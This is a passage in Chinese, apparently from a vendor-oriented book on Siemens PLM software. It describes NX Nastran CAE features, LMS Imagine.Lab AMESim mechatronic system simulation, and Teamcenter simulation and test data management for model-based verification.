Nastran增加了该单元,使六面体单元与四面体单元可以通过该单元自动过渡连接,因而六面体与四面体混合建模就变得更加方便;另一方面提高了线性粘接功能,在两部分体模型交界面定义一个Glue关系即可,不需要节点合并,这使建模变得更加自由、方便。NX Nastran求解大量线性粘结问题不影响计算速度,跟节点重合连接方式一样。线性Glue(见图5-8)、线性接触功能经过20多年的实践检验,无论是计算速度与精度都是其他软件的标杆。NX CAE的线性Glue、线性接触可以在Nastran求解系列sol 101、103、109、110、111、112等中直接应用,并且具有线-面Glue功能,极大地方便了壳单元与体单元连接,这是线性结构分析中经常需要用到的,解决了困扰CAE工程师多年的难题。 图5-8 利用线性Glue技术通过六面体网格的焊点将两个板焊接起来,不需要节点对齐,瞬间自动完成粘接 ·直接螺栓预紧力定义界面菜单。NX前后处理器能够直接给1D螺栓和3D六面体网格螺栓定义螺栓预紧力,这个轻松解决了传统Nastran软件需要用温度冷缩来模拟螺栓预紧力的复杂方法。 ·机械CAE仿真工业标准求解器NX Nastran。新一代结构求解器NX Nastran来自于2003年被美国联邦贸易委员会根据反垄断法强行拆分的MSC Nastran,这些年西门子工业软件公司投入了大量人力财力致力发展NX Nastran。目前NX Nastran在线性接触、线性黏接、并行技术、迭代求解、流固耦合和热固耦合等仿真技术处于行业领先地位。NX Nastran将Adina非线性功能完全集成进来后,扩展了传统Nastran非线性分析的能力,为客户提供方便使用知名非线性分析软件的集成环境。用户所有的应用方式都是Nastran的风格,不需要再重新去学Adina的格式。 ·真正的多学科多物理场一体化界面环境。NX CAE是真正的多学科多物理场一体化图形界面环境,就是在一个界面环境中可以进行结构静力/动力分析(线性/非线性)、CFD、机构运动、热分析、热流耦合、热结构耦合、热结构流体耦合、机电液联合仿真、疲劳分析和优化分析等。所有的操作界面风格完全一样,便于交流与应用。 ·超大规模模型计算能力。广泛应用的NX NASTRAN求解器中包括先进的Iterative Solver快速算法,特别适合结构的强度与刚度的快速计算,其计算效率是其他求解器的5~10倍;并行处理特别是64位计算能力得到极大的提高,应用NX NASTRAN的DMP或SMP可以高效地进行大规模模型的求解;在连接单元处理技术方面领先于其他厂商的产品,可以方便地进行线性接触计算、螺栓预紧连接、GLUE粘接处理;非线性能力方面,具有显式与隐式非线性计算能力,考虑结构的大位移、大应变、材料的非线性特性与接触等,收敛稳健且并行计算效率高。针对动力响应分析,NX Nastran开发了新的RdMode方式的并行计算技术,可以使模态法求解速度达到专业加速软件的效果。 ·专门的动力响应分析工具包(见图5-9)。NX提供了一个新的模块NX Response Simulation,该模块使得做各种各样的动力响应分析变得异常便利。可以方便输入时间域、频率域的各种类型的载荷数据(曲线)来进行瞬态、频率响应分析、随机分析、响应谱分析、跌落分析、冲击分析等,而且响应的分析结果可以实时生成云图、曲线、动画。无论是设计工程师还专业CAE分析人员都能轻松使用。该模块还带有数据变换功能,如可以将试验曲线(或者其他来源曲线)进行时域傅里叶变换、时域生成PSD、时域到SRS,或者从PSD变换到时域,也可以自动从速度曲线生成加速度曲线等等。 图5-9 专业的动力响应分析工具集 ·强大的二次开发工具NX Open。具有强大的CAE二次开发、客户化定制功能、NX Open利用.net、XML等开发语言将客户的典型分析流程、分析规范模板化,方便进行正确高效的分析工作。 ·广泛的求解器支持。NX CAE可以为多种第三方求解器(如Ansys、Abaqus、Nastran、Ls-dyna、Adams、Recurdyn等)做前后处理器,这样客户如果以前有其他求解器,可以利用NX CAE强大的有限元建模能力,使原有的软件发挥出更大的效率。 ·西门子PLM CAE的未来开发方向如图5-10所示。 图5-10 西门子PLM CAE愿景 第6章 基于模型的机电一体化系统工程解决方案 6.1 业务挑战 新产品需要满足日益提高的各项要求,一方面需要达到产品的性能指标以体现产品的品牌价值;另一方面又需要满足日趋严格的各项环保法规的要求。随着产品系列范围的持续扩大以及全球化开发的趋势,当今的工程化流程面临的挑战已不仅仅只限于提供必要的产品和流程的创新。 随着控制系统及其软件应用的日益增加,产品的复杂程度不断增加,而产品复杂性的增加正推动市场向系统工程迈进。为进一步支持机电一体化产品的开发,开发流程正向基于模型的系统工程方法转变。结合了控制的多物理场系统仿真又被称作机电一体化系统仿真,它对开发过程中每一阶段的性能是否满足要求所进行的验证至关重要。 系统集成已经变得至关重要,它用于实现不同设计方案的权衡分析并预测任何系统集成所面临的技术问题。系统集成包含把设计需求分解至子系统及部件级,以提高部件和子系统的校核仿真的真实性和效率。为了推动工业进步,LMS解决方案将仿真和基于试验的工程方法结合在一起,既可以在开发的早期对子系统进行验证,又可以为最终系统验证提供高效的测试手段。随着LMS Imagine.Lab平台的发展,LMS为走向基于模型的系统工程开发流程提供了解决方案,即通过构建多物理场子系统和系统模型作为“受控对象”模型,使得在设计的尽可能早期开展基于模型在环(MiL)、软件在环(SiL)和硬件在环(HiL)开发方法的控制系统工程。 6.2 解决方案 LMS Imagine.Lab采用基于模型的系统工程方法,面向机电一体化系统仿真,使得LMS Imagine.Lab平台为工程师提供了一个从功能需求直到物理建模和仿真的开放的开发流程。该平台包含三个模块,如图6-1所示。 图6-1 Imagine.Lab机电一体化仿真解决方案 ·Imagine.Lab AMESim:创建和运行多物理场仿真模型以分析复杂的系统特性,并支持控制系统的设计,从早期的技术参数确定到子系统测试(硬件在环)。 ·Imagine.Lab SysDM:存储和管理横跨不同部门的受控对象和控制系统的模型以及数据。 ·Imagine.Lab System Synthesis:对工程设计问题进行综合,根据性能需求创建产品的架构,对不同技术方案以及配置进行综合的工况设定,驱动仿真并对结果进行后处理的综合环境。 1.Imagine.Lab AMESim——多学科领域系统仿真的集成平台 Imagine.Lab AMESim仿真平台通过丰富的专用库,避免了繁琐的数学建模工作,工程师可以对多领域智能系统进行建模和分析,评测多物理领域系统中的各种不同子系统的特性。通过这种方法,设计部门能够根据需要满足的关键品牌属性来综合平衡产品各方面的性能,从而在进行昂贵且耗时的样机测试之前找到最佳的设计方案。由于Imagine.Lab AMESim能够在早期的开发中切实地进行前期的系统仿真,它真正能够实现通过关键的设计功能来驱动新产品的开发。 Imagine.Lab AMESim拥有一套标准并经过优化的应用库(见图6-2),这些库中包含了4500多个来自不同物理领域预先定义好并经试验验证的部件模型。库中的模型和子模型是基于物理现象的数学解析表达式,描述了系统的液压、气动、电子、机械性能,用户只需把来自各个经过验证的应用库中预先定义好的元件模型组装起来,即可创建基于物理学的系统模型。不同应用库之间完全兼容,省去了大量额外的编程。 图6-2 Imagine.Lab AMESim应用库 2.Imagine.Lab AMESim——解决方案 Imagine.Lab AMESim提供了一个简单易用的一维仿真过程来简化多领域系统的集成,为用户提供了专用的多领域仿真解决方案,用以分析动力传动和变速器、内燃机、车辆热管理、流体系统、地面载荷和飞行控制、车辆系统动力学、能源系统和机电系统等问题。每一个解决方案都包含一套专用应用库,提供各种仿真能力以评估特定子系统的性能。应用库帮助用户快速起步并调整设计以达到在性能、安全性、舒适性、可靠性、油耗、最小排放和优化成本方面的特定要求。例如,分析和优化传动系统的NVH性能,或为内燃机设计良好气道管理及进行ECU标定。通过Imagine.Lab AMESim,可以对系统进行独立的研究,Imagine.Lab AMESim真正的独特之处在于,可以在单一的环境中集成各个系统,以评估它们的交互作用。 Imagine.Lab AMESim能够用来分析如下问题。 ·动力传动变速器 :舒适性、NVH、性能及损失。 ·内燃机 :发动机控制、混合动力汽车、气道管理、排放、燃烧。 ·车辆系统动力学 :车辆动力学、悬架与防侧倾、车辆动力学控制、转向系统、制动系统。 ·热管理 :车辆热管理、制冷循环、发动机热管理、乘客舒适性、发动机冷却系统、润滑系统。 ·流体系统 :内燃机相关的液压系统、环境控制系统、工程机械液压系统、航空发动机装置。 ·地面载荷和飞行控制 :地面载荷、飞行控制。 ·机电系统 :机电元件、电气系统。 ·新能源系统 :燃料电池、推进系统。 (1)工业应用 Imagine.Lab AMESim涵盖了广泛的工业应用,在汽车和地面车辆、航空航天、机械工业领域等均有专用的解决方案。 Imagine.Lab AMESim提供了专用的解决方案用于所有主要的车辆子系统分析:内燃机、变速器、车辆热管理系统、车辆系统动力学、底盘子系统、传动系统、流体系统以及电气系统等。 为航空航天子系统和元件设计及整机集成提供了专用的航空航天解决方案:虚拟飞机集成、航空发动机、航空燃油、航空电气、液压系统、环境控制系统、飞控系统、环控系统、地面载荷、机电元件以及多电系统、虚拟铁鸟测试等。 在机械工业领域中,Imagine.Lab AMESim为风能、燃气涡轮和蒸汽轮机、短路开关、水电站机械、再生/余热发电、泵和阀、工程机械、大型柴油机、家用电器、造船业、医疗设备、加工工业、AC空调供暖系统等,提供了系统性能分析、电子/控制集成、能量管理、系统耐久性等相关的解决方案。 ·在乘用车及商用车 领域,提供燃油经济性、尾气排放控制、车辆能量管理、驾驶室舒适性、安全性、驾驶性能、平顺性及操纵性、传动系统扭振、变速箱动力学、性能&损失、控制集成和子系统集成等相关的解决方案。 对传动系统 提供双质量飞轮、扭矩矢量管理和扭振方面的解决方案。 对车辆 提供传统车辆、纯电动、混合动力车的排放系统、发动机舱热力学系统、空调、驾驶舱、电气网络和车辆动力学方面的解决方案。 对底盘系统 提供制动、转向和悬架/防侧倾方面的解决方案。 对内燃机 提供发动机控制、(进/排)气系统、燃烧室、发动机冷却、润滑,以及燃油喷射和气门机构的解决方案。 对变速器 提供手动、自动、无级变速、双离合变速器和混合动力各种解决方案。 ·在航空航天 领域,提供虚拟集成飞机、虚拟铁鸟、能量和热管理、假定工况分析、失效影响分析、舱内舒适性、动力管理、发动机集成、整机热分析、系统设计与性能、控制系统集成、子系统集成优化和动态测试方面的解决方案。 针对环境控制系统 ,提供引气、防冰、通风回路和氧气与救生系统的解决方案。 针对起落架 ,提供制动系统、刹车系统、转向系统和减振器方面的解决方案。 针对能量分配网络 ,提供液压系统、气动系统、电气系统和电缆线束方面的解决方案。 针对发动机装置 ,提供燃油计量系统、润滑系统、换热器、推力反向器和设备箱方面的解决方案。 针对飞控系统 ,提供主飞行控制和次飞行控制(EHA、EMA),以及增升装置、扰流板和空气制动方面的解决方案。 ·在机械工业 领域,提供燃油经济性、污染物减排、整车能量管理、舱室舒适性、安全性、驾驶性能、平顺性和操纵性、传动系扭振、传动动力学、性能与损耗、控制集成,以及子系统集成方面的解决方案。 针对传动系 ,提供双质量飞轮、扭矩矢量和扭转动力学方面的解决方案。 针对车辆集成 ,提供排放、发动机舱热管理、空调、舱室、电网和底盘方面的解决方案。 针对底盘系统 ,提供制动、转向和悬挂/抗侧倾方面的解决方案。 针对能源系统 ,提供液压作动器、气液系统和电动马达方面的解决方案。 针对内燃机 ,提供发动机控制、进排气、燃烧、发动机冷却、润滑,以及燃油喷射和配气机构方面的解决方案。 针对传动系统 ,提供手动变速器、自动变速器、无级变速、静液传动和混动架构方面的解决方案。 (2)开发环境 Imagine.Lab AMESim开放且高效的开发环境 (见图6-3),可与第三方软件进行有效集成,用于软件在环(SiL)、模型在环(MiL)、硬件在环(HiL)、实时仿真、多体仿真、过程集成以及设计优化;通过共仿真接口可以耦合动态三维模型;Imagine.Lab AMESim提供专用于特定应用程序的模型和代码生成流程,依据此流程可以在最短的开发周期内获得高品质的控制代码。 此外,Imagine.Lab AMESim与Teamcenter的接口支持用户通过对Teamcenter所提出的需求,将可实施方案中的最佳方案提供给用户。 3.Imagine.Lab SysDM——基于模型的系统工程的模型和数据管理 Imagine.Lab SysDM为管理来自LMS Imagine.Lab AMESim和其他系统仿真工具的系统模型和数据提供了一套方法,为基于模型的系统工程数据提供了一个协同的环境。Imagine.Lab SysDM是一个仓储系统,在这里,工程师可以为系统仿真和数据创建一个和企业或者部门组织结构对应良好的仓储模型,系统仿真的模型和数据可以按照工程师的组织结构便捷地进行分类、查询和检索。“版本”管理使数据的生命周期管理贯穿于整个产品开发周期。系统中的相同部件和子系统的不同模型可以通过“变型”管理来处理,可以根据开发阶段和仿真目的的不同对系统模型进行分类编号。基于角色的访问控制支持各种协作工程流的实施。总之,它是一个开发团队应用基于模型的系统工程进行知识资本化的奠基石。 图6-3 Imagine.Lab AMESim提供高效的开发环境 4.Imagine.Lab Synthesis——配置管理、系统集成和架构管理的专用工具 系统工程是基于自上而下的方法:根据产品需求定义功能,这些功能通过具体的机械和控制子系统来实现。机械和控制子系统可以通过仿真来验证所选架构是否符合最初的需求。Imagine.Lab System Syntheis为这种自上而下的开发流程提供了一个平台,通过该平台可以在一个用于仿真的完整系统逻辑视图中对模型和控制进行配置与集成。系统集成设计工程师可以编著最符合逻辑的视图,然后进行配置并把所需要的不同模型集成进去进行系统仿真。 通过Imagine.Lab System Synthesis,系统工程师和架构工程师可以使用来自多个不同的模型编著工具,例如Imagine.Lab AMESim、Simulink和Modelica的数据及模型,无缝地结合在一起进行概念设计和系统架构设计、集成和验证。它支持系统装配的工作,最终生成一个可执行的系统模型,用于不同工况的验证以及完整系统方案的优化。 Systems Synthesis是一个支持机电系统架构驱动开发的开放“中立工具”环境。架构驱动开发流程是一个自上而下的设计方法,从创建或输入来自中立工具的架构模型,应用物理模型、控制模型或库(从AMESim、Simulink、C代码或其他程序中创建)进行配置,到在目标求解平台中进行仿真。通过正确接口定义的架构,Imagine.Lab System Synthesis支持各种类型的“自上而下”仿真流程的系统建模。 6.3 价值定位 通过LMS Imagine.Lab AMESim功能驱动设计的理念,用户可以在早期开发阶段分析智能系统的功能特性;在样机测试前,优化机械、液压、气动、热和电子/电气系统间的复杂交互作用;同时,支持工程师对关键功能的主动设计,以提高产品的整体性能和品质;避免主要设计缺陷,探索创新设计,加速产品开发。 通过LMS Imagine.Lab AMESim,用户可以在产品开发周期早期的智能系统仿真中发挥重要作用,从而真正实现通过关键功能品质设计来驱动新产品开发。 第7章 基于模型的验证管理解决方案 7.1 验证管理的业务挑战 产品复杂度不断增加是科学进步的重要标志,以汽车为例,产品复杂度增加表现在集成了电气化、传动系统、底盘、安全性等子系统后其控制系统的复杂性会显著增长,需要在精密性上有重要的改进,因此需要致力于在研发过程中管控机电集成化系统。这不仅仅带来了设计上的机电一体化要求,同时还要求开展多物理场的综合仿真模拟,比如要进行电气学、液压学、热力学和机构运动学的仿真。基于模型系统驱动的研发手段能够帮助研发团队充分理解产品的复杂性,复杂需求是如何影响不同系统、子系统和部件的,以及相互依存的关系在系统、子系统和部件中是如何演绎的。图7-1中的基于模块的框架便于企业充分理解在整体中的跨部门的相互依赖关系,并提供一个兼顾需求、设计、部门验证的整体性的业务管理模式。 图7-1 基于系统工程V模型的需求、验证与设计闭环 需求、设计以及验证所构成的闭环,要求采用基于验证的方式证明设计是满足需求的。这意味着在开发的各个阶段即可进行验证并开展模拟和测试活动,以便早期就能够验证系统架构。基于模型的系统工程活动包含设置子系统和组件性能要求,并且与对应的设计活动以及验证目标对应起来,从而形成有机的系统组织形式的产品研发活动,满足基于MBE的研发目标与流程。 验证管理(Verification Management)的管理对象包括虚拟的1D系统行为仿真&3D基于几何的CAE(含CFD)仿真分析,以及物理样机测试试验这两个重要的组成部分。仿真数据和流程管理通常被简称为SDM(Simulation Data Management),试验数据管理通常被称为TDM(Test Data Management),两者的管理对象不同,但在业务活动中其实是密不可分的,面对的也是共同的需求,相互之间需要保证非常紧密的关联性,以保证可以溯源到正确的关联对象。尤其是对于复杂的产品,验证过程是漫长而复杂的,产品的需求管理着成千上万的要求与变化,在产品的整个生命周期里,多种配置的产品以及对应仿真或者试验活动需要经过精确的方式进行管理,这些复杂业务对象的关联关系,是验证管理所必不可少的管理内容。 在基于系统工程驱动的研发体系下,验证管理与产品的需求紧密相关,通过虚拟和实物的验证来实现对需求的验证,从而贯彻实现系统工程的能力的分解与落实,按照系统的性能分解会和后续的仿真与试验对应起来,更便于追踪系统的性能,利用性能样机的组织方式来管理后续的性能评估、仿真与试验业务活动。此类业务需求更是促进了各种验证工具和方法的蓬勃发展。目前大型制造企业的仿真工具少则几十种,多则达上千种,试验室的建设规模也日益扩大,试验工程师使用各种试验测试仪器、设备对产品进行测试。 随着产品的复杂性增加以及按照可配置化设计的方式,造成下游的仿真和试验业务也需要按照可配置化的方式组织数据,以提高对子模型的利用,减少大规模的盲目建模和时间浪费,以快速验证多种设计和配置方案。多元化的企业组织结构,以及全球化的分工,也带来异地协同的必要性。大规模验证工具的使用带来了更多数据和流程的管理挑战。无论是仿真分析数据还是试验样机都是与设计数据、流程高度相关的,不能单独看待这部分业务的数据与流程,而是需要考虑仿真分析使用的设计数据版本、试验数据等,不同岗位的业务人员都需要保证使用的数据是单一数据源的,以便减少数据的误用。因此基于同一数据平台查询不同数据的关联性就显得尤为必要。 在企业建立PLM管理平台的初期是以PDM的建设为首,PDM所管理的CAD数据信息和设计流程是企业开展仿真业务的数据输入,也是制造产品、试验产品的数据输入。传统的PDM管理的仅仅是CAD的数据以及与设计任务高度相关的文档,如果借用目前的PDM产品去管理种类繁多的仿真和试验数据,这意味着将对原有系统做大量的二次开发或定制种类繁多的集成方案。如果采用与PDM孤立的系统去管理仿真分析或者试验业务的数据和流程,又会带来另外的问题,比如无法和设计版本的信息与需求关联、项目管理片段式、带来不易分享的仿真或者试验结果。 因此需要一体化的PLM平台满足客户设计、仿真、制造、试验等的一体化要求,以对采用统一的需求、项目管理实现对企业研发生产流程的统一管理。保证引用单一的数据源,管理不同设计阶段数据的全生命周期变化,满足设计、仿真、制造、试验等业务的高迭代的过程。 7.2 解决方案 客户的需求不断促进着验证数据管理方案的发展与演化,从最初独立式的仿真、试验数据管理平台建设,逐步发展到与PDM系统集成化的仿真、试验数据流程管理平台。最近几年随着系统工程理念在企业的深入推广,仿真与试验数据管理平台的建设又面临着与系统工程需求管理平台集成的要求。 基于模型的验证业务典型流程如图7-2所示,包括总体需求分解、验证计划的确定、仿真需求、仿真执行、试验需求管理、试验准备管理、试验执行管理及试验合规报告等多项步骤。 图7-2 验证需求业务流程图 西门子公司不断引领PLM行业的创新,基于Teamcenter平台逐步扩展最新PLM领域的应用,先后推出了针对3D CAE仿真数据流程管理平台的Teamcenter for Simulation模块、1D系统仿真管理的Teamcenter与LMS Imagine.Lab集成方案,以及试验数据流程管理加速方案(Catalyst Solution)。利用Teamcenter平台的柔性化、开发性的特点,与第三方仿真工具、试验分析软件结合形成集成方案,共同构建适应最新PLM发展的验证管理解决方案(Verification Management)。该应用可与Teamcenter软件其他的基础功能,如需求管理、项目管理、流程管理、可视化等进行联合应用,构建出更加完整的企业级全生命周期的数据流程管理方案(见图7-3、图7-4)。目前此类方案已经被广泛地应用在航空、航天、汽车、能源、家电等多个行业,并给客户带来巨大的效率价值。 图7-3 企业级验证管理平台架构 7.2.1 仿真数据流程管理方案概览 西门子公司提供的Teamcenter是一个覆盖产品需求、设计、仿真、试验、制造、维修和报废的全生命周期管理平台,如图7-5所示。仿真数据管理又称为SDM(Simulation Data Management)平台,是关于仿真数据和流程的解决方案。它与设计数据、试验数据同属于PLM整体平台之上的不同数据应用的领域,也是验证管理方案的重要分支。 图7-4 全生命周期BOM的需求关联变化 图7-5 基于Teamcenter的1D&3D仿真数据管理解决方案架构 7.2.2 1D系统行为模型数据管理方案 1D系统行为模型数据管理(Behavioral Model Management)是采用Teamcenter提供的与LMS Imagine.Lab(包括Amesim、Systems Synthesis和SysDM系列产品)集成环境共同构成1D系统行为或控制模型的数据与流程管理平台,可满足对1D模型的工作协同、数据流程管理和重用需求,并且能够结合企业的整体PLM平台,共同进行需求、项目进度管理,与设计、试验部门进行更有效、更广泛的协同工作(见图7-6)。 图7-6 Teamcenter与LMS Imagine.Lab集成关系图 LMS Imagine.Lab平台包括几个部分。 ·Imagine.Lab AMESim:创建和运行多物理场仿真模型以分析复杂的系统特性,并支持控制系统的设计,从早期的技术参数确定到子系统测试(硬件在环)。 ·Imagine.Lab System Synthesis:提供配置和集成物理量,或控制由LMS Amesim或者其他编程软件比如MATLAB Simulink所创建的模型。对工程设计问题进行综合,根据性能需求创建产品的架构,对不同技术方案及配置进行综合的工况设定,驱动仿真并对结果进行后处理的综合环境。 ·Imagine.Lab SysDM:存储和管理横跨不同部门的受控对象和控制系统的模型及数据。 1.企业系统仿真模型管理 随着产品的设计越来越复杂,创新周期越来越短,产品开发越来越分散,针对模型的性能和架构分析的企业管理显得更加重要。Teamcenter与LMS Imagine.Lab集成环境提供了管理1D系统行为仿真的环境,通过该种方式不但可建立对LMS Imagine.Lab模型架构的管理,也可以对其他仿真软件模型如MATLAB Simulink模型构建管理关系,LMS Imagine.Lab还支持基于SYSML语言的外部模型导入(见图7-7)。因此通过该集成环境可实现对广泛系统模型、控制模型的管理,并且将PLM系统中的需求、配置与这些模型架构关联起来,真正实现基于模型的仿真验证管理。 图7-7 Teamcenter与LMS Imagine.Lab集成工作流程图 2.单一来源的模型数据进行验证 在许多公司,建模与仿真过程通常涉及来自不同地方和学科的几十或几百个工程师。这些工程师群体中的每个人都会创建许多模型,存储在分布于各地的多个服务器的多个数据库中,这种方式使模型管理和重复使用变得困难。通常工程师会遇到以下困难: ·管理模型库和数据; ·搜索模型; ·清楚模型是否有效; ·在建立模型的同时,记录模型的所有变化; ·在正确的时间,将模型的变化传递给用户正确设置。 将LMS Imagine.Lab和Teamcenter集成在一起,建模与仿真团队可以将所有的不同信息组织到单个环境中,使多个团队、项目、产品可以同时利用这些信息。Teamcenter管理所有的模型,仿真结果以及它们之间的联系。作为管理对象,模型和仿真数据可用于结构化工作流和变更过程中。通过提供版本控制、变化管理、访问控制,Teamcenter可以确保在正确的时间为客户提供精准且一致的模型信息。 3.搜索、发现、共享和重用模型 Teamcenter提供了多种方法来查询模型数据,通过使用嵌入在LMS Imagine.Lab中的Active Workspace客户端,根据包括分类名称、分类属性、关系、验证版本、最新版本、作者姓名、元素名称、数据集名称、发布日期等多种搜索标准,可快速搜索到模型库。帮助工程师快速识别和选择正确的模型,而且该使用条件贯穿整个设计过程,从而减少了在众多模型库和服务器中进行模型的查询以及对条件的理解的困扰。 依据Teamcenter的分类方案采用用户自定义方式,工程师可以在模型定义中创建层次、类别、属性和有效属性值,这可用于快速定位一个特定的设计元素以及重用相关产品和过程数据。 Teamcenter的分类功能支持创建域或者组织模型库,基于物理对象、接口、方法、用法、确认和验证等属性。该模型用相关域方法组织,不仅可帮助浏览和搜索所需要的模型,而且追踪到一个模型所满足的需求后,其测试的输入数据可用于验证与模型相关的可测量属性值,还可用于模型已经得到应用和验证的仿真环境和场景中。 4.可追溯性 依据可追溯性和版本控制功能,在Teamcenter中容易找到系统模型的连接并追踪它们,以及仿真输入和输出,测试实例数据,需求,架构模型和其他设计对象。从Teamcenter内部,或者利用嵌入在LMS Imagine.Lab中的Active Workspace客户端,可以利用关联或者跟踪矩阵浏览器,明确地追踪目标之间的依赖性和联系,例如哪些模型用于产品的一个特定配置的性能验证,或者在做出了工程更改之后,哪些模型将会受到影响。精准的操作和调查这些关系的能力,对确保产品的质量起到决定性作用,尤其是随着模型的发展,产品发生了改变,或者模型被多个产品和配置引用时更是这样。 7.2.3 3D仿真数据流程管理方案 作为企业级仿真数据和流程管理系统,Teamcenter for Simulation支持端到端的3D仿真流程,其开放系统能够通过配置集成任何仿真软件,并且管理输入和输出的仿真数据过程文件和参数,满足各种仿真流程自动化的定义(见图7-8)。作为与Teamcenter无缝集成的模块,可与基础功能和权限管理、流程管理等联合应用,构建出基础的仿真数据管理平台,为设计、分析和试验等各类人员提供共享的产品仿真数据。还可以配合系统工程、项目管理等模块构建功能更为全面的仿真数据管理平台。Teamcenter for Simulation支持丰富的B/S、C/S和Active Workspace客户端以满足不同用户的需求。 图7-8 Teamcenter 3D仿真数据管理工作流程图 Teamcenter for Simulation有以下主要能力,包括: ·仿真数据管理; ·仿真生命周期管理; ·闭环的产品验证; ·仿真结构管理; ·仿真结构自动化; ·仿真过程管理; ·仿真可视化。 其架构图如图7-9所示。 1.仿真数据管理 Teamcenter for Simulation提供了种类繁多的3D CAE业务对象(如CAE简化模型、CAE网格、CAE分析、CAE结果等),可用于CAE各个业务过程的数据对象管理。可以利用对象之间的关联关系来捕获仿真文件以及与其相关联的原数据,同时可以结构化地存储和管理不同版本的仿真数据,对于较大的仿真结果文件的管理,通常会通过链接方式将其保存在外部数据库中,并且在Teamcenter中可以方便地导入和导出仿真数据文件。 图7-9 Teamcenter for Simulation架构图 2.仿真生命周期管理 可捕获和管理仿真生命周期数据,对仿真数据执行生命周期操作(仿真数据创建、修改、更新、删除、发布和存档等)。仿真生命周期独立于产品生命周期,同时两者又保持着关联性。不同类型的业务对象可以定义不同的“目标”或者“源”关系以建立彼此之间的复杂上下文关联关系。这些业务过程中彼此之间的复杂谱系关系便可以从系统中一目了然地获取。 3.闭环的产品验证 可捕获和管理所有产品性能需求、产品验证需求以及验证程序相关联的仿真。需求与仿真数据保持完整的可追溯性,同时分析人员可以仿真结果并进行验证,从而形成从需求到产品到仿真真正的闭环验证。 4.仿真结构管理 通常设计CAD BOM只有一种,通过变量配置而产生不同种类的工程BOM。而管理CAE数据的CAE BOM除了产品种类不同外,还需要依据不同的学科分析而呈现出多样化的CAE BOM,原因是分析所引起的CAD对象存在着差异性。Teamcenter for Simulation提供了依据CAD BOM快速构建CAE BOM的功能。当分析人员从设计人员那得到通知时,可以通过工作流启动指令和链接到适当的仿真数据上,并且可以同步仿真模型与设计模型,比较CAD BOM和CAE BOM之间的变化(产生新的组件、版本变化和移除组件等)。 5.仿真结构自动化 通过一组预定义的规则自动地从CAD BOM创建CAE BOM,使用结构映射(Structure Map)规则,利用CAE结构设计器来创建结构规则,常见的规则有如下几种: ·基于规则删除BOM行,例如自动过滤掉分析中不需要的螺钉、销钉等连接件; ·重用现有的CAE BOM版本。如果之前的产品结构已经做过分析,结构映射规则可以重用这部分到新的产品结构中去; ·增加现有的CAEModel业务对象版本; ·创建目前没有的新的CAEModel业务对象版本。 6.仿真过程管理 Teamcenter提供了一个框架可以配置任何外部仿真工具,使用这个集成框架,客户可以集成各种前处理、解算器和后处理工具,并可以捕获和管理这些应用程序所产生的数据。 Teamcenter提供了柔性化的方式,与多种前处理工具可以进行多种方式的集成、封装和调用(见图7-10)。仿真工具的集成是仿真数据管理平台建设的重要内容,工具集成依靠PLMXML这类通用接口的方式是技术上最可行的方向,而且集成实施成本低。 图7-10 Teamcenter支持柔性化的仿真工作流程 对于Teamcenter与求解器的集成,多通过计算平衡调度系统如PBS Pro、LSF Platform等进行集成调用,或者在Teamcenter通过配置调用求解器执行文件来完成,这样用户无需离开仿真数据管理环境就可以进行仿真作业的递交和计算结果的回传。 同时Teamcenter可以与工程优化软件紧密集成,如Optimus、ModelCenter、FIPER、modeFRONTIER等。这些工程优化软件可以集成仿真工作流程、自动运行仿真工作流程、管理和分析仿真计算结果。 7.与第三方CAE工具的集成 除了能够与NX CAE产品实现无缝集成之外,目前Teamcenter for Simulation软件可以有多种方式和第三方软件和优化平台进行集成。通过PLMXML方式实现与HyperMesh、Ansa等软件的集成,仿真集成框架通过脚本的方式与绝大多数CAE工具集成,能够传递CAD装配模型、结构、材料等多种参数(见图7-11)。 图7-11 Teamcenter管理第三方仿真工具的启动 8.仿真可视化 CAD文件的JT可视化给数据管理带来了非常多的益处,如无需通过工具就可以对CAD结构进行轻量化浏览,还可以对轻量化模型的外形进行比较,同时非设计人员审批也采用轻量化可视化模型,可简化客户端软件的安装,提高决策的效率和质量。对于CAE模型、结果等,也可以采用JT格式对网格、分析结果进行可视化浏览,起到与设计模型管理相同的作用,目前常用的CAE软件都支持并能生成仿真模型JT文件(见图7-12)。 图7-12 CAE模型的JT可视化显示 7.2.4 试验数据流程管理方案概览 西门子公司依据试验数据管理的特点和与PLM系统的集成需要,开发了基于Teamcenter平台的适用于试验数据流程管理的加速方案(Catalyst)产品,将其作为验证管理解决方案的重要组成部分,实现了从试验请求、试验方案、试验执行到试验报告的闭环,可追溯管理,保证试验各阶段之间的关联,同时也保证了各阶段与试验数据的关联。该解决方案的最大亮点在于基于需求对后续的试验业务流程进行平台化管理,并且该平台是与产品数据管理、制造数据管理、仿真数据管理的链接,保证相关数据在设计、制造、仿真和试验之间无缝流通。另外根据试验数据的应用环境来分平台处理试验过程数据与试验结果数据,是西门子针对试验数据的复杂性和多样性提出的有效解决方案(见图7-13)。 西门子针对企业试验相关的业务需求提供了一套试验管理解决方案,通过评估产品、子系统和组件来验证产品是否满足公司需求。在系统中整个验证的流程包含以下步骤: ·产品需求分解; ·规划验证策略(选择验证方法:虚拟仿真或物理样机试验); ·安排和管理试验活动(试验需求&过程,试验样机构建与改装); ·试验执行(虚拟分析&物理测试); ·试验报告; ·确认合规要求。 图7-13 与需求管理关联的试验业务流程 1.产品需求分解 需求分解是指用来制定和管理产品需求的一系列任务。Teamcenter需求管理模块可以帮助制定产品需求,也可以使用其他工具如IBM Rational DOORS等软件制定的需求,通过该类软件与Teamcenter的商业化成熟接口将其导入其中做进一步处理。在需求分解过程中,可以为项目定义集成产品团队(IPT)和工作分解结构(WBS)。确保为每个需求分配一个具有功能性、逻辑性、物理性的结构与一个IPT结构上。该分配确保需求验证的组织责任,而且确保每个需求都会链接到一个项目结构,通过该种方式可帮助快速了解需求变更后对下游设计、仿真、制造和试验等业务的影响(见图7-14)。 2.规划验证策略 基于产品研发项目性质和进度要求,选择使用仿真分析或物理样机某种单一方式或者共用方式对产品进行验证以测试是否满足产品所必需的性能。Teamcenter平台提供了很好的数据记录,方便企业的研发团队在以往的数据中查询以往项目的验证结果和流程,以帮助制定明智的验证策略。 3.安排和管理试验活动 验证(含试验和仿真)计划描述了针对计划和安排需求验证活动而必须执行的一系列任务。验证管理方案提供了Teamcenter项目管理模块之外的一些额外的功能,用来创建进度计划总表和其他的验证管理任务。在验证计划过程中,通过定义每个需求的验证方法来开始验证活动,然后通过进度计划总表为其排程。确保每个计划任务分配到合适的工作分解结构(WBS)元素(见图7-15)。 图7-14 需求结构化分解 图7-15 WBS分解 (1)试验需求管理与配置和管理试验样件 